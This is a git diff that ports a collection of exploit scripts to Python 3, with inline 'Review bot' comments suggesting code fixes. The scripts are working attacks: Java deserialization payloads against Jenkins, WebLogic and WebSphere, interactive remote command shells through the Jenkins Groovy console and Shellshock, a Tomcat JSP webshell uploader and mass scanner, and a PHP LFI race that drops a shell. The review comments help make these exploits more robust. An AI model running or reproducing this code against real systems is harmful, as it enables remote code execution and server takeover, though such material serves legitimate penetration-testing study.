d\x65\x6e\x74\x3b\x02\x46\x2a\x3c\x3c\xfd\x22\x39\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x0b\x73\x72\x00\x1b\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x61\x63\x6b\x54\x72\x61\x63\x65\x45\x6c\x65\x6d\x65\x6e\x74\x61\x09\xc5\x9a\x26\x36\xdd\x85\x02\x00\x04\x49\x00\x0a\x6c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x4c\x00\x0e\x64\x65\x63\x6c\x61\x72\x69\x6e\x67\x43\x6c\x61\x73\x73\x71\x00\x7e\x00\x02\x4c\x00\x08\x66\x69\x6c\x65\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x4c\x00\x0a\x6d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x71\x00\x7e\x00\x02\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x43\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x6f\x6d\x6d\x61\x6e\x64\x74\x00\x0c\x43\x6f\x6d\x6d\x61\x6e\x64\x2e\x6a\x61\x76\x61\x74\x00\x06\x3c\x69\x6e\x69\x74\x3e\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x32\x71\x00\x7e\x00\x15\x71\x00\x7e\x00\x16\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x63\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x71\x75\x65\x73\x74\x74\x00\x0c\x52\x65\x71\x75\x65\x73\x74\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x02\x39\x74\x00\x32\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x24\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x74\x00\x1c\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\xf6\x74\x00\x27\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x52\x65\x6d\x6f\x74\x65\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x71\x00\x7e\x00\x1e\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x73\x71\x00\x7e\x00\x13\xff\xff\xff\xff\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x24\x50\x72\x6f\x78\x79\x31\x70\x74\x00\x0f\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x7
4\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x04\xe7\x74\x00\x17\x68\x75\x64\x73\x6f\x6e\x2e\x72\x65\x6d\x6f\x74\x69\x6e\x67\x2e\x43\x68\x61\x6e\x6e\x65\x6c\x74\x00\x0c\x43\x68\x61\x6e\x6e\x65\x6c\x2e\x6a\x61\x76\x61\x74\x00\x15\x77\x61\x69\x74\x46\x6f\x72\x52\x65\x6d\x6f\x74\x65\x50\x72\x6f\x70\x65\x72\x74\x79\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x93\x74\x00\x0e\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x74\x00\x08\x43\x4c\x49\x2e\x6a\x61\x76\x61\x71\x00\x7e\x00\x17\x73\x71\x00\x7e\x00\x13\x00\x00\x00\x48\x74\x00\x1f\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x74\x00\x19\x43\x4c\x49\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x46\x61\x63\x74\x6f\x72\x79\x2e\x6a\x61\x76\x61\x74\x00\x07\x63\x6f\x6e\x6e\x65\x63\x74\x73\x71\x00\x7e\x00\x13\x00\x00\x01\xdf\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x05\x5f\x6d\x61\x69\x6e\x73\x71\x00\x7e\x00\x13\x00\x00\x01\x86\x71\x00\x7e\x00\x2a\x71\x00\x7e\x00\x2b\x74\x00\x04\x6d\x61\x69\x6e\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x4c\x69\x73\x74\xfc\x0f\x25\x31\xb5\xec\x8e\x10\x02\x00\x01\x4c\x00\x04\x6c\x69\x73\x74\x71\x00\x7e\x00\x0f\x77\x04\xff\xff\xff\xfd\x78\x72\x00\x2c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x24\x55\x6e\x6d\x6f\x64\x69\x66\x69\x61\x62\x6c\x65\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x19\x42\x00\x80\xcb\x5e\xf7\x1e\x02\x00\x01\x4c\x00\x01\x63\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x3b\x77\x04\xff\xff\xff\xfd\x78\x70\x73\x72\x00\x13\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x41\x72\x72\x61\x79\x4c\x69\x73\x74\x78\x81\xd2\x1d\x99\xc7\x61\x9d\x03\x00\x01\x49\x00\x04\x73\x69\x7a\x65\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x00\x77\x04\x00\x00\x00\x00\x78\x71\x00\x7e\x00\x39\x78\x71\x00\x7e\x00\x08\x00\x00\x00\x00\x00\x0
0\x00\x00\x70\x00\x00\x00\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x18\x68\x75\x64\x73\x6f\x6e\x2e\x63\x6c\x69\x2e\x43\x6c\x69\x45\x6e\x74\x72\x79\x50\x6f\x69\x6e\x74\x71\x00\x7e\x00\x24\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x77\x04\xff\xff\xff\xfd\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x74\x00\x1d\x52\x50\x43\x52\x65\x71\x75\x65\x73\x74\x28\x31\x2c\x77\x61\x69\x74\x46\x6f\x72\x50\x72\x6f\x70\x65\x72\x74\x79\x29' sock.send(payload) -print '[+] Sent payload' +print('[+] Sent payload') diff --git a/CVE Exploits/Jenkins CVE-2016-0792.py b/CVE Exploits/Jenkins CVE-2016-0792.py index 70b4709..fdf4163 100644 --- a/CVE Exploits/Jenkins CVE-2016-0792.py +++ b/CVE Exploits/Jenkins CVE-2016-0792.py @@ -4,6 +4,7 @@ #Note: Although this is listed as a pre-auth RCE, during my testing it only worked if authentication was disabled in Jenkins #Made with <3 by @byt3bl33d3r +from __future__ import print_function import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @@ -23,17 +24,17 @@ if len(sys.argv) < 2: args = parser.parse_args() if len(args.target.split(':')) != 2: - print '[-] Target must be in format IP:PORT' + print('[-] Target must be in format IP:PORT') sys.exit(1) if not args.command: - print '[-] You must specify a command to run' + print('[-] You must specify a command to run') sys.exit(1) ip, port = args.target.split(':') -print '[*] Target IP: {}'.format(ip) -print '[*] Target PORT: {}'.format(port) +print('[*] Target IP: {}'.format(ip)) +print('[*] Target PORT: {}'.format(port)) xml_formatted = '' command_list = args.command.split() 
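Review bot: The `@@ -64,24 +65,24 @@` hunk converts only the `print` statements, while the socket code around them still treats wire data as `str`. `sock.send(headers)`, `data.find('JENKINS REMOTING CAPACITY')` and the concatenation of the `payload` literal with `payload_b64` all mix text and bytes, which Python 3 rejects with TypeError. The added `from __future__ import print_function` therefore suggests a Python 3 compatibility the file does not have. Until the byte handling is ported, I would state that at the top of the file, e.g. `# NOTE: Python 2 only - socket data below is str, not bytes`.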
@@ -67,11 +68,11 @@ xml_payload = ''' '''.format(xml_formatted.strip()) -print '[*] Generated XML payload:' -print xml_payload -print +print('[*] Generated XML payload:') +print(xml_payload) +print() -print '[*] Sending payload' +print('[*] Sending payload') headers = {'Content-Type': 'text/xml'} r = requests.post('{}://{}:{}/createItem?name=rand_dir'.format(args.proto, ip, port), verify=False, headers=headers, data=xml_payload) @@ -79,5 +80,5 @@ paths_in_trace = ['jobs/rand_dir/config.xml', 'jobs\\rand_dir\\config.xml'] if r.status_code == 500: for path in paths_in_trace: if path in r.text: - print '[+] Command executed successfully' + print('[+] Command executed successfully') break diff --git a/CVE Exploits/Jenkins Groovy Console.py b/CVE Exploits/Jenkins Groovy Console.py index 10bc080..2c32fc9 100644 --- a/CVE Exploits/Jenkins Groovy Console.py +++ b/CVE Exploits/Jenkins Groovy Console.py @@ -1,30 +1,32 @@ #!/usr/bin/env python # SRC: https://raw.githubusercontent.com/bl4de/security-tools/master/jgc.py # DOC: https://medium.com/@_bl4de/remote-code-execution-with-groovy-console-in-jenkins-bd6ef55c285b +from __future__ import print_function +from builtins import input import requests import sys -print """ +print(""" Jenkins Groovy Console cmd runner. usage: ./jgc.py [HOST] Then type any command and wait for STDOUT output from remote machine. Type 'exit' to exit :) -""" +""") URL = sys.argv[1] + '/scriptText' HEADERS = { 'User-Agent': 'jgc' } while 1: - CMD = raw_input(">> Enter command to execute (or type 'exit' to exit): ") + CMD = input(">> Enter command to execute (or type 'exit' to exit): ") if CMD == 'exit': - print "exiting...\n" + print("exiting...\n") exit(0) DATA = { 'script': 'println "{}".execute().text'.format(CMD) } result = requests.post(URL, headers=HEADERS, data=DATA) - print result.text \ No newline at end of file + print(result.text) \ No newline at end of file 
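Review bot: The new `from builtins import input` in the Jenkins Groovy Console hunk makes the third-party `future` package a runtime dependency on Python 2, and nothing visible in this diff declares or pins it. The Shellshock hunk goes further with `from future import standard_library`, which fails with ImportError on Python 3 as well when `future` is not installed, and the Tomcat hunk adds four `from builtins import ...` lines. I would declare the package with a pinned version in a requirements file and note it in each script header, e.g. `# Requires: future (pip install future) for Python 2 compatibility`.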
diff --git a/CVE Exploits/Shellshock CVE-2014-6271.py b/CVE Exploits/Shellshock CVE-2014-6271.py index 5ca4949..3246c80 100755 --- a/CVE Exploits/Shellshock CVE-2014-6271.py +++ b/CVE Exploits/Shellshock CVE-2014-6271.py @@ -11,22 +11,26 @@ # .. # ~$ /bin/cat /etc/passwd -import sys, urllib2 +from __future__ import print_function +from future import standard_library +standard_library.install_aliases() +from builtins import input +import sys, urllib.request, urllib.error, urllib.parse if len(sys.argv) != 2: - print "Usage: shell_shocker " + print("Usage: shell_shocker ") sys.exit(0) URL=sys.argv[1] -print "[+] Attempting Shell_Shock - Make sure to type full path" +print("[+] Attempting Shell_Shock - Make sure to type full path") while True: - command=raw_input("~$ ") - opener=urllib2.build_opener() + command=input("~$ ") + opener=urllib.request.build_opener() opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] try: response=opener.open(URL) for line in response.readlines(): - print line.strip() - except Exception as e: print e + print(line.strip()) + except Exception as e: print(e) diff --git a/CVE Exploits/Tomcat CVE-2017-12617.py b/CVE Exploits/Tomcat CVE-2017-12617.py index 52b325e..4b72ffb 100755 --- a/CVE Exploits/Tomcat CVE-2017-12617.py +++ b/CVE Exploits/Tomcat CVE-2017-12617.py 
@@ -7,21 +7,25 @@ options: --u ,--url [::] check target url if it's vulnerable --p,--pwn [::] generate webshell and upload it +-u ,--url [::] check target url if it's vulnerable +-p,--pwn [::] generate webshell and upload it -l,--list [::] hosts list [+]usage: -./cve-2017-12617.py -u http://127.0.0.1 -./cve-2017-12617.py --url http://127.0.0.1 -./cve-2017-12617.py -u http://127.0.0.1 -p pwn -./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn -./cve-2017-12617.py -l hotsts.txt +./cve-2017-12617.py -u http://127.0.0.1 +./cve-2017-12617.py --url http://127.0.0.1 +./cve-2017-12617.py -u http://127.0.0.1 -p pwn +./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn +./cve-2017-12617.py -l hotsts.txt ./cve-2017-12617.py --list hosts.txt """ +from __future__ import print_function +from builtins import input +from builtins import str +from builtins import object import requests import re import signal @@ -34,7 +38,7 @@ from optparse import OptionParser -class bcolors: +class bcolors(object): HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' @@ -50,14 +54,14 @@ class bcolors: banner=""" - _______ ________ ___ ___ __ ______ __ ___ __ __ ______ + _______ ________ ___ ___ __ ______ __ ___ __ __ ______ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | - | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / - | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / - | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / - \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ - - + | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / + | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / + | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / + \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ + + [@intx0x80] 
@@ -79,9 +83,9 @@ signal.signal(signal.SIGINT, signal_handler) def removetags(tags): - remove = re.compile('<.*?>') - txt = re.sub(remove, '\n', tags) - return txt.replace("\n\n\n","\n") + remove = re.compile('<.*?>') + txt = re.sub(remove, '\n', tags) + return txt.replace("\n\n\n","\n") def getContent(url,f): @@ -94,9 +98,9 @@ def createPayload(url,f): headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers) if req.status_code==201: - print "File Created .." + print("File Created ..") + - def RCE(url,f): EVIL="""
""".format(f)+""" @@ -119,26 +123,26 @@ InputStreamReader(p.getInputStream()));
<%=output %>
""" - + headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} - + req=requests.put(str(url)+f+"/",data=EVIL, headers=headers) - + def shell(url,f): - + while True: headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} - cmd=raw_input("$ ") + cmd=input("$ ") payload={'cmd':cmd} if cmd=="q" or cmd=="Q": - break - + break + re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers) re=str(re.content) t=removetags(re) - print t + print(t) @@ -152,21 +156,21 @@ parse=OptionParser( bcolors.HEADER+""" - _______ ________ ___ ___ __ ______ __ ___ __ __ ______ + _______ ________ ___ ___ __ ______ __ ___ __ __ ______ / ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ | - | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / - | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / - | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / - \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ - - + | | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / / + | | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / / + | |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / / + \_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/ + + ./cve-2017-12617.py [options] options: --u ,--url [::] check target url if it's vulnerable +-u ,--url [::] check target url if it's vulnerable -p,--pwn [::] generate webshell and upload it -l,--list [::] hosts list @@ -187,7 +191,7 @@ options: ) -parse.add_option("-u","--url",dest="U",type="string",help="Website Url") +parse.add_option("-u","--url",dest="U",type="string",help="Website Url") parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it") parse.add_option("-l","--list",dest="L",type="string",help="hosts File") 
@@ -201,47 +205,35 @@ if opt.U==None and opt.P==None and opt.L==None: else: if opt.U!=None and opt.P==None and opt.L==None: - print bcolors.OKGREEN+banner+bcolors.ENDC - url=str(opt.U) - checker="Poc.jsp" - print bcolors.BOLD +"Poc Filename {}".format(checker) - createPayload(str(url)+"/",checker) - con=getContent(str(url)+"/",checker) - if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: - print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC - print bcolors.WARNING+url+"/"+checker+bcolors.ENDC - - else: - print 'Not Vulnerable to CVE-2017-12617 ' + print(bcolors.OKGREEN+banner+bcolors.ENDC) + url=str(opt.U) + checker="Poc.jsp" + print(bcolors.BOLD +"Poc Filename {}".format(checker)) + createPayload(str(url)+"/",checker) + con=getContent(str(url)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC) + print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC) + + else: + print('Not Vulnerable to CVE-2017-12617 ') elif opt.P!=None and opt.U!=None and opt.L==None: - print bcolors.OKGREEN+banner+bcolors.ENDC - pwn=str(opt.P) - url=str(opt.U) - print "Uploading Webshell ....." 
- pwn=pwn+".jsp" - RCE(str(url)+"/",pwn) - shell(str(url),pwn) + print(bcolors.OKGREEN+banner+bcolors.ENDC) + pwn=str(opt.P) + url=str(opt.U) + print("Uploading Webshell .....") + pwn=pwn+".jsp" + RCE(str(url)+"/",pwn) + shell(str(url),pwn) elif opt.L!=None and opt.P==None and opt.U==None: - print bcolors.OKGREEN+banner+bcolors.ENDC - w=str(opt.L) - f=open(w,"r") - print "Scaning hosts in {}".format(w) - checker="Poc.jsp" - for i in f.readlines(): - i=i.strip("\n") - createPayload(str(i)+"/",checker) - con=getContent(str(i)+"/",checker) - if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: - print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m" - - - - - - - - - - - - + print(bcolors.OKGREEN+banner+bcolors.ENDC) + w=str(opt.L) + f=open(w,"r") + print("Scaning hosts in {}".format(w)) + checker="Poc.jsp" + for i in f.readlines(): + i=i.strip("\n") + createPayload(str(i)+"/",checker) + con=getContent(str(i)+"/",checker) + if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: + print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m") diff --git a/CVE Exploits/WebLogic CVE-2016-3510.py b/CVE Exploits/WebLogic CVE-2016-3510.py index b77ad9b..706e0b1 100644 --- a/CVE Exploits/WebLogic CVE-2016-3510.py +++ b/CVE Exploits/WebLogic CVE-2016-3510.py @@ -4,6 +4,7 @@ #Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits) #Made with <3 by @byt3bl33d3r +from __future__ import print_function import socket import struct import argparse 
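Review bot: In the `opt.L` branch the hosts file is opened with `f=open(w,"r")` and never closed, and `f.readlines()` loads the whole file before the loop starts. A context manager closes the handle on every exit path: `with open(w) as f:` followed by `for i in f:`. `i.strip("\n")` also leaves a trailing `\r` on files with Windows line endings, so `i.strip()` is the safer call. The `opt.U!=None` / `opt.P==None` comparisons in the branch conditions read better as `is not None` / `is None`; the enclosing `if`/`else` starts above this hunk.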
@@ -34,29 +35,29 @@ else: ysoserial_path = args.ysoserial_path if len(args.target.split(':')) != 2: - print '[-] Target must be in format IP:PORT' + print('[-] Target must be in format IP:PORT') sys.exit(1) if not args.command: - print '[-] You must specify a command to run' + print('[-] You must specify a command to run') sys.exit(1) ip, port = args.target.split(':') sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -print '[*] Target IP: {}'.format(ip) -print '[*] Target PORT: {}'.format(port) +print('[*] Target IP: {}'.format(ip)) +print('[*] Target PORT: {}'.format(port)) sock.connect((ip, int(port))) # Send headers headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' -print '[*] Sending header' +print('[*] Sending header') sock.sendall(headers) data = sock.recv(1024) -print'[*] Received: "{}"'.format(data) +print('[*] Received: "{}"'.format(data)) payloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command]) @@ -67,5 +68,5 @@ payload += '\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f # adjust header for appropriate message length payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:]) -print '[*] Sending payload' +print('[*] Sending payload') sock.send(payload) diff --git a/CVE Exploits/WebLogic CVE-2017-10271.py b/CVE Exploits/WebLogic CVE-2017-10271.py index 9990f95..71236dd 100644 --- a/CVE Exploits/WebLogic CVE-2017-10271.py +++ b/CVE Exploits/WebLogic CVE-2017-10271.py @@ -1,3 +1,5 @@ +from __future__ import print_function +from builtins import input import requests import sys 
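Review bot: Adding `from __future__ import print_function` makes this file look Python 3-ready, but the socket code in this hunk is still Python 2-only: `sock.sendall(headers)` is given a `str`, which Python 3 rejects with `TypeError`, and the `"{0}{1}".format(struct.pack(...), ...)` line in the `@@ -67,5 +68,5 @@` hunk would format the `repr` of a `bytes` object there. Until the str/bytes handling is ported, I would say so at the top of the file, e.g. `# NOTE: Python 2 only; socket I/O below still uses str, not bytes`. The socket is also never closed and has no timeout, so a silent peer blocks `recv` forever; `sock.settimeout(10)` after creation would bound that.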
@@ -44,18 +46,18 @@ def do_post(command_in): result = requests.post(payload_url, payload_command(command_in ),headers = payload_header) if result.status_code == 500: - print "Command Executed \n" + print("Command Executed \n") else: - print "Something Went Wrong \n" + print("Something Went Wrong \n") -print "***************************************************** \n" \ +print("***************************************************** \n" \ "**************** Coded By 1337g ****************** \n" \ "* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \ - "***************************************************** \n" + "***************************************************** \n") while 1: - command_in = raw_input("Eneter your command here: ") + command_in = input("Eneter your command here: ") if command_in == "exit" : exit(0) do_post(command_in) diff --git a/CVE Exploits/WebLogic CVE-2018-2894.py b/CVE Exploits/WebLogic CVE-2018-2894.py index 0fd904a..18adab0 100755 --- a/CVE Exploits/WebLogic CVE-2018-2894.py +++ b/CVE Exploits/WebLogic CVE-2018-2894.py @@ -2,6 +2,8 @@ # coding:utf-8 # Build By LandGrey +from __future__ import print_function +from builtins import str import re import sys import time diff --git a/CVE Exploits/WebSphere CVE-2015-7450.py b/CVE Exploits/WebSphere CVE-2015-7450.py index d542637..c37215e 100644 --- a/CVE Exploits/WebSphere CVE-2015-7450.py +++ b/CVE Exploits/WebSphere CVE-2015-7450.py @@ -4,6 +4,8 @@ #Based on the nessus plugin websphere_java_serialize.nasl #Made with <3 by @byt3bl33d3r +from __future__ import print_function +from builtins import chr import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) @@ -34,7 +36,7 @@ if not args.command: elif args.command: if len(args.command) > 254: - print '[-] Command must be less then 255 bytes' + print('[-] Command must be less then 255 bytes') sys.exit(1) ip, port = args.target.split(':') 
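Review bot: The input loop ends with the bare `exit(0)`, which is injected by the `site` module and is missing under `python -S` or in frozen builds; `sys` is already imported at the top of the file, so `sys.exit(0)` is the dependable form. `do_post`, which starts above this hunk, calls `requests.post` with no `timeout=`, so one unresponsive server blocks the loop and any connection error surfaces as an uncaught traceback. The prompt has a typo: `"Eneter your command here: "` should read `"Enter your command here: "`. The `from builtins import input` added at the top also needs the third-party `future` package on Python 2, which the commit does not document.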
@@ -75,4 +77,4 @@ headers = {'Content-Type': 'text/xml; charset=utf-8', 'SOAPAction': 'urn:AdminService'} r = requests.post('{}://{}:{}'.format(args.proto, ip, port), data=xmlObj, headers=headers, verify=False) -print '[*] HTTPS request sent successfully' +print('[*] HTTPS request sent successfully') diff --git a/File inclusion/phpinfolfi.py b/File inclusion/phpinfolfi.py index 7042c31..2f4cc8e 100644 --- a/File inclusion/phpinfolfi.py +++ b/File inclusion/phpinfolfi.py @@ -1,5 +1,7 @@ #!/usr/bin/python # https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf +from __future__ import print_function +from builtins import range import sys import threading import socket @@ -83,7 +85,7 @@ class ThreadWorker(threading.Thread): if self.event.is_set(): break if x: - print "\nGot it! Shell created in /tmp/g" + print("\nGot it! Shell created in /tmp/g") self.event.set() except socket.error: @@ -110,23 +112,23 @@ def getOffset(host, port, phpinforeq): if i == -1: raise ValueError("No php tmp_name in phpinfo output") - print "found %s at %i" % (d[i:i+10],i) + print("found %s at %i" % (d[i:i+10],i)) # padded up a bit return i+256 def main(): - print "LFI With PHPInfo()" - print "-=" * 30 + print("LFI With PHPInfo()") + print("-=" * 30) if len(sys.argv) < 2: - print "Usage: %s host [port] [threads]" % sys.argv[0] + print("Usage: %s host [port] [threads]" % sys.argv[0]) sys.exit(1) try: host = socket.gethostbyname(sys.argv[1]) - except socket.error, e: - print "Error with hostname %s: %s" % (sys.argv[1], e) + except socket.error as e: + print("Error with hostname %s: %s" % (sys.argv[1], e)) sys.exit(1) port=80 @@ -134,8 +136,8 @@ def main(): port = int(sys.argv[2]) except IndexError: pass - except ValueError, e: - print "Error with port %d: %s" % (sys.argv[2], e) + except ValueError as e: + print("Error with port %d: %s" % (sys.argv[2], e)) sys.exit(1) poolsz=10 
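Review bot: The final `print('[*] HTTPS request sent successfully')` runs unconditionally: it says HTTPS even when `args.proto` is `http`, and it reports success without looking at `r`. Reporting what was actually observed is more useful, e.g. `print('[*] {} request sent, status {}'.format(args.proto.upper(), r.status_code))`. The call also has no `timeout=`, and with `verify=False` plus the `disable_warnings(InsecureRequestWarning)` at the top of the file the certificate is never checked and nothing tells the user so; a one-line comment stating that this is deliberate would help the next reader.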
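Review bot: The error path `print("Error with port %d: %s" % (sys.argv[2], e))` formats `sys.argv[2]`, a string, with `%d`, so a non-numeric port raises `TypeError` inside the `except ValueError` handler and the user gets a traceback instead of the message. The same mistake is in the following hunk, `"Error with poolsz %d: %s" % (sys.argv[3], e)`. Both should use `%s`, e.g. `print("Error with port %s: %s" % (sys.argv[2], e))`. `main` starts and ends outside this hunk.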
@@ -143,11 +145,11 @@ def main(): poolsz = int(sys.argv[3]) except IndexError: pass - except ValueError, e: - print "Error with poolsz %d: %s" % (sys.argv[3], e) + except ValueError as e: + print("Error with poolsz %d: %s" % (sys.argv[3], e)) sys.exit(1) - print "Getting initial offset...", + print("Getting initial offset...", end=' ') reqphp, tag, reqlfi = setup(host, port) offset = getOffset(host, port, reqphp) sys.stdout.flush() @@ -156,7 +158,7 @@ def main(): e = threading.Event() l = threading.Lock() - print "Spawning worker pool (%d)..." % poolsz + print("Spawning worker pool (%d)..." % poolsz) sys.stdout.flush() tp = [] @@ -174,19 +176,19 @@ def main(): sys.stdout.flush() if counter >= maxattempts: break - print + print() if e.is_set(): - print "Woot! \m/" + print("Woot! \m/") else: - print ":(" + print(":(") except KeyboardInterrupt: - print "\nTelling threads to shutdown..." + print("\nTelling threads to shutdown...") e.set() - print "Shuttin' down..." + print("Shuttin' down...") for t in tp: t.join() if __name__=="__main__": - print "Don't forget to modify the LFI URL" + print("Don't forget to modify the LFI URL") main() diff --git a/File inclusion/uploadlfi.py b/File inclusion/uploadlfi.py index ce910b0..93526d5 100644 --- a/File inclusion/uploadlfi.py +++ b/File inclusion/uploadlfi.py @@ -1,3 +1,5 @@ +from __future__ import print_function +from builtins import range import itertools import requests import string diff --git a/Server Side Request Forgery/Files/ip.py b/Server Side Request Forgery/Files/ip.py index f55959f..52be158 100644 --- a/Server Side Request Forgery/Files/ip.py +++ b/Server Side Request Forgery/Files/ip.py @@ -2,6 +2,10 @@ # coding=utf-8 # https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py from __future__ import print_function +from builtins import oct +from builtins import str +from builtins import hex +from builtins import range from random import * from io import open import datetime 
